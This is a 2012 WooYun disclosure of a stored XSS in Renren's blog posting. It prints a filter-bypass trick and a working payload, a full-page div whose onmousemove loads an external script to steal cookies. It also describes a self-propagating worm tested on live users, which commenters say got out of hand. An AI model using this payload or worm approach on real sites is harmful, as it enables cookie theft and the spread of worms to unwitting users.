当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-015078

漏洞标题:人人网日志存储型XSS 绕过过滤器 小范围测试了蠕虫

相关厂商:人人网

漏洞作者: Duking

提交时间:2012-11-21 19:43

修复时间:2013-01-05 19:44

公开时间:2013-01-05 19:44

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-11-21: 细节已通知厂商并且等待厂商处理中
2012-11-23: 厂商已经确认,细节仅向厂商公开
2012-12-03: 细节向核心白帽子及相关领域专家公开
2012-12-13: 细节向普通白帽子公开
2012-12-23: 细节向实习白帽子公开
2013-01-05: 细节向公众公开

简要描述:

@Drizzle.Risk 公布了腾讯空间/校友的日志XSS,话说这洞我还木有好好玩呢,就被发出来了。算了发个人人网的日志存储型XSS,可以加载外部JS,获取Cookies,自动发日志传播XSS代码。小范围测试了蠕虫。危害比较严重。

详细说明:

日志发布时候通过Chrome的审查元素直接编辑HTML代码,或者通过burpsuite改包就可以发布HTML格式的数据。可是发现过滤的比较严,通过一大堆测试样本黑盒测试后发现了侧漏。经过好长时间的筛选找打了绕过过滤器的地方,诡异的很。到现在还很郁闷人人的过滤器到底是个什么机制。

edit.png


XSS测试代码只要加上

<a href="http://www.test.com/gv">&nbsp;</a>


这个标签XSS过滤器就完全失效。后面的gv是必须的,中间也可加字符,比如g__v g.....v 等等 可能是通过正则提取来判断的,黑盒测试结果。。。不明真相,很是郁闷。
比如:
以下代码被过滤

<script>alert(/xss/);</script>


以下代码可以绕过过滤器

<script>alert(/xss/);</script>
<a href="http://www.test.com/gv">&nbsp;</a>


是不是很奇葩?
但是如果直接加入script标签,script标签里面的数据会被注释掉.

xss.png


于是使用img 的onerror事件 发现居然过滤掉了 说明在这一层还有过滤的
添加了个DIV设置长宽为100% 使用onmousemove行为来触发XSS.
最终利用代码如下

<div style="height:100%; width:100%;z-index:10;position:absolute; left:0px; top:0px;" id="Nietzsche" 
onmousemove="var script=document.createElement('SCRIPT');script.setAttribute('type','text/javascript');script.setAttribute('src','http://xxxxxx.com/xss-test/renren/test.js');document.getElementsByTagName('head')[0].appendChild(script);">
<a href="http://www.test.com/gv">&nbsp;</a>
</div>


之后想干什么都可以了。。比如妹纸信息什么的。。
后来和@Drizzle.Risk一起研究了下发日志的功能,发日志时需要验证token,要先获得token。然后@Drizzle.Risk就写了个蠕虫,之前在wooyun看过有人发人人的蠕虫被删账号的,怕怕。就小范围测试了下。可以自动发日志传播XSS代码,标记日志为喜欢。
JS代码就不发上来了

漏洞证明:

弹窗长的都一样

cookies.png


测试下蠕虫
只要放个图片,基本上都会点的吧
点击之后。就可以自动喜欢该日志以及发表新XSS日志。

ruchong.png


RIZHI.png


最后发个福利。。贴个大图

修复方案:

过滤器的规则貌似有点问题。 具体还是交给人人的大牛分析吧。。

版权声明:转载请注明来源 Duking@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2012-11-23 02:24

厂商回复:

小样儿,下次别玩的这么hi,哥被你折腾惨了,所以给你一分

最新状态:

暂无

漏洞评价:

评论

  1. 2012-11-21 19:57 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    膜拜,会跨站的都是大牛。。。

  2. 2012-11-21 20:20 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    @Duking大猥琐....

  3. 2012-11-21 22:24 | cnrstar ( 普通白帽子 | Rank:157 漏洞数:23 | Be my personal best!)

    这个跨的严重了。。膜拜、

  4. 2012-11-22 08:39 | Duking ( 路人 | Rank:1 漏洞数:1 | 懒人啦~~)

    @鬼魅羊羔 俺小白一个。。 = =

  5. 2012-11-22 22:14 | 小一 ( 实习白帽子 | Rank:32 漏洞数:13 )

    目测是那个 I Love You , My Sweetheart

  6. 2012-11-22 22:21 | 九零 ( 路人 | Rank:5 漏洞数:1 | http://www.90blog.org)

    @小一 你来了。。。

  7. 2012-11-23 03:12 | 猴子 ( 路人 | Rank:19 漏洞数:5 | 我是一只骚猴子)

    哈哈,厂商真有意思

  8. 2012-11-23 08:56 | qiaoy ( 普通白帽子 | Rank:110 漏洞数:16 )

    @人人网 这样也行!?

  9. 2012-11-23 09:06 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    厂商回复真牛B~

  10. 2012-11-23 09:37 | mckelvin ( 路人 | Rank:10 漏洞数:4 )

    厂商回复真牛B~

  11. 2012-11-23 09:45 | Adra1n ( 普通白帽子 | Rank:437 漏洞数:68 )

    厂商回复真牛B~

  12. 2012-11-23 10:14 | 瓜瓜 ( 普通白帽子 | Rank:173 漏洞数:25 )

    厂商回复真牛B~

  13. 2012-11-23 10:39 | upload ( 普通白帽子 | Rank:251 漏洞数:43 | 此处略--!)

    @人人网 这是发生什么的。。

  14. 2012-11-23 11:13 | Duking ( 路人 | Rank:1 漏洞数:1 | 懒人啦~~)

    @人人网 Sorry啊。。范围没有控制好。。Orz...

  15. 2012-11-23 11:37 | 人人网(乌云厂商)

    @Duking 恩 和历届发蠕虫的比,你的蠕虫功能还不完善。私信我,咱交流交流~

  16. 2012-11-23 11:58 | y35u ( 普通白帽子 | Rank:364 漏洞数:38 | yesu)

    厂商回复真牛B~

  17. 2012-11-23 11:59 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @人人网 直接乌云交流吧

  18. 2012-11-23 12:02 | cnrstar ( 普通白帽子 | Rank:157 漏洞数:23 | Be my personal best!)

    哈哈,厂商碉堡了。

  19. 2012-11-23 12:43 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    厂商回复真牛B~

  20. 2012-11-23 13:39 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    @Duking 哈哈 .... 我就说 , 不让你乱发.... 谁让你乱搞蠕虫 哈哈 笑死我了....等我给你电话

  21. 2012-11-23 13:44 | 陈再胜 ( 普通白帽子 | Rank:121 漏洞数:13 | 微博收收听~~~●﹏●)

    希望其他厂商也能像人人网学习~~~

  22. 2012-11-23 13:56 | 猴子 ( 路人 | Rank:19 漏洞数:5 | 我是一只骚猴子)

    小样儿,下次别玩的这么hi,哥被你折腾惨了,所以给你一分哈哈,厂商回复看一次笑一次、。。。不知道你这一折腾,他是多少个通宵。。哈哈,笑死我了、。

  23. 2012-11-23 14:35 | 人人网(乌云厂商)

    @xsser 我说的就是乌云的私信,口误

  24. 2012-11-23 19:01 | Duking ( 路人 | Rank:1 漏洞数:1 | 懒人啦~~)

    @y35u 1分好苦逼

  25. 2012-11-23 19:37 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    | Rank:1 漏洞数:1 看着好光棍的感脚哦。 。

  26. 2012-11-26 17:40 | xssx ( 路人 | Rank:0 漏洞数:1 | ><!--)

    厂商回复也狠hi...

  27. 2012-12-21 19:23 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    厂商评论很HIGH~~~

  28. 2012-12-25 14:44 | rivers ( 实习白帽子 | Rank:85 漏洞数:10 | research on web security)

    厂商回复真有爱~1分,笑傻了~

  29. 2012-12-29 15:33 | 黄小昏 ( 实习白帽子 | Rank:55 漏洞数:7 | alert(妹子))

    哈哈,厂商是在太搞了...

  30. 2013-01-05 21:30 | Spy198x ( 路人 | 还没有发布任何漏洞 | 撸得一手好扳.)

    厂商回复真牛B~

  31. 2013-01-05 21:51 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    回复牛逼了

  32. 2013-01-05 22:03 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    。。。这。。。就给1rank??

  33. 2013-01-05 22:38 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @px1624 蠕虫没控制好,1分处罚处罚~

  34. 2013-01-05 22:41 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @gainover 。。。蠕的猛踩给力啊。。

  35. 2013-01-05 22:45 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @px1624 造成实际危害的话,随时准备喝茶。

  36. 2013-01-05 22:53 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @px1624 现在觉得一个论坛最严重的不是盗号而是蠕虫,搞大了影响比盗号还要厉害,关键开发和dba清数据就少则几小时多则几天,以前sam那个蠕虫搞的人家都关闭网站了

  37. 2013-01-05 22:53 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @gainover 。。。好虚。。。

  38. 2013-01-05 22:54 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @小胖胖要减肥 。。。现在不是网站都有数据备份还原功能么,直接还原到未被蠕虫的时候么

  39. 2013-01-06 09:51 | shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)

    霸气外泄的回复

  40. 2013-01-06 10:25 | saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)

    厂商态度明显有问题,wooyun这个平台是干嘛的?不要觉得丢了面子,总比别人大范围测试不提交给你好多了

  41. 2013-01-06 10:28 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @saline 可能是洞主玩蠕虫玩大了。。。

  42. 2013-01-09 11:05 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    @saline @px1624 的确玩的略大....